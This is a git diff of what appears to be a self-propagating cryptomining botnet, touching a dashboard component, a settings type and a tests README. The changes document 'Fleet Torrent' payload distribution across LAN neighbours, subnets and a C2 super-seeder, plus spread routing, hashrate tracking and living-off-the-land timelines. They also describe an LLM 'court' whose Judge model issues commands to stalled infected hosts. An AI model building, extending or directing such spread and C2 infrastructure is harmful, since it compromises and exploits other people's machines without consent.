+ ◈ SEER NOTES + +
+
+ {loading &&
Loading notes…
} + {emptyNotes && ( +
+ Server-persisted AI memory — appended each turn as SEER_NOTE lines. +
+ )} + {notes.map((note) => ( + + ))} +
+
+
+
+ ); +} diff --git a/server/web/src/types/index.ts b/server/web/src/types/index.ts index 4d8104f..74685e0 100644 --- a/server/web/src/types/index.ts +++ b/server/web/src/types/index.ts @@ -377,6 +377,8 @@ export interface ServerSettings { fleet_roles_enabled?: boolean; /** Reed–Solomon multi-lane shard metadata on signed deploy plans (default off). */ erasure_lanes_enabled?: boolean; + /** Fleet Torrent shard DHT + cross-subnet gossip (default off). */ + fleet_torrent_enabled?: boolean; /** Triple onion recon/deploy gates pushed to agents at auth. */ triple_onion_policy?: { patch_first?: boolean; diff --git a/tests/README.md b/tests/README.md index 91d4354..51b8bd9 100644 --- a/tests/README.md +++ b/tests/README.md @@ -63,6 +63,7 @@ Windows dashboard only; no in-process cloudflared. Genealogy fields are **teleme | **Genetic phenotype breeding** | `server/internal/strategy/breeding.go` merges sibling phenotypes | `go test ./internal/strategy/... -run Breeding -count=1` | | **BGP-style spread router** | `server/internal/spreadrouter/`; Path Tracer + deploy plan `spread_route_hint` | `go test ./internal/spreadrouter/... -count=1`; `go test ./internal/api/... -run SpreadRoute -count=1` | | **Erasure-coded multi-lane spread (foundation)** | Server `internal/erasure/` RS 4+2 encode + `erasure_plan` on deploy plans; agent `deploy/erasure_staging.go` k-of-n reassembly fallback; Calibrate `server.erasure_lanes_enabled` + Path Tracer `RS lanes` hint | `go test ./internal/erasure/... -count=1`; `go test ./internal/api/... -run Erasure -count=1`; `go test ./deploy/... -run Erasure -count=1`; `go test ./config/... ./client/... -run Erasure -count=1` | +| **Fleet Torrent (erasure extension)** | Content-addressed shard DHT on seeder agents; `subnet_primary_seeder` auth hint; `fleet_torrent_gossip` cross-subnet relay; BGP `swarm_magnet` + `shard_manifest_urls` on `spread_route_hint`; C2 super-seeder `/api/v1/public/erasure-torrent/{token}/manifest`; agent `deploy/fleet_torrent.go` k-of-n from 3 LAN neighbors → subnet peers → C2; zero-server 30m reconnect | `go test ./internal/erasure/... -run Torrent -count=1`; `go test ./internal/atlas/... -run FleetGossip -count=1`; `go test ./internal/api/... -run FleetTorrent -count=1`; `go test ./deploy/... ./client/... ./config/... -run FleetTorrent -count=1`; Vitest `settingHelp.test.ts` fleet_torrent row | | **Spread genealogy watermark** | Forge `-ldflags` + env overrides; auth/stats JSON only | `go test ./config/... -run Genealogy -count=1`; `go test ./internal/builder/... -run Genealogy -count=1`; `go test ./internal/api/... -run SpreadGenealogy -count=1` | | **Genealogy grafting** | Court `spread_graft` + L4 + hashrate gate; `POST /api/v1/fleet/graft`; auth `graft_policy` push; agent applies tier order on next spread; zero config when `ai_control_enabled` + `fleet_roles_enabled` | `go test ./internal/strategy/... -run Graft -count=1`; `go test ./internal/api/... -run FleetGraft -count=1`; `go test ./client/... -run GraftPolicy -count=1`; Vitest `AccessDepthPanel.test.tsx` graft note, `PathTracerPage.test.tsx` graft note | | **Court retry + L4 elevation** | `server/internal/ai/court_commands.go`, scheduler `ensureCourtRetryClearance` | `go test ./internal/ai/... -run CourtRetry -count=1` | @@ -182,7 +183,11 @@ cd agent && go test ./client/... -run "AtlasGossip|Gossip" -count=1 ## Court session -When AI Control is on and a host is stuck (zero hashrate + exhausted chain or all spread tiers failed), the scheduler runs a **Singular Machine Court**: Prosecutor (failure atlas + attempts), Defender (fleet phenotype), Judge (verdict + commands). Persisted with `court_session=true` for LOTL Timeline. +When AI Control is on and a host is stuck (zero hashrate + exhausted chain or all spread tiers failed), the scheduler runs an **adversarial L4 court chamber**: Prosecutor and Public Defender speak from real telemetry only (hashrate, subnet immune table, failure atlas, erasure recovery, LAN gossip whispers); Judge (LLM) issues verdict + commands at L4 clearance. Full transcript broadcasts on dashboard WS `seer_events` (`event_type=court_debate`) and optionally `emberwake_court_debate`. Persisted with `court_session=true` on LOTL Timeline. + +```bat +cd server && go test ./internal/ai/... ./internal/api/... -run "CourtChamber|CourtDebate|IntegrationCourtStuck" -count=1 +``` ## Clearance L0–L4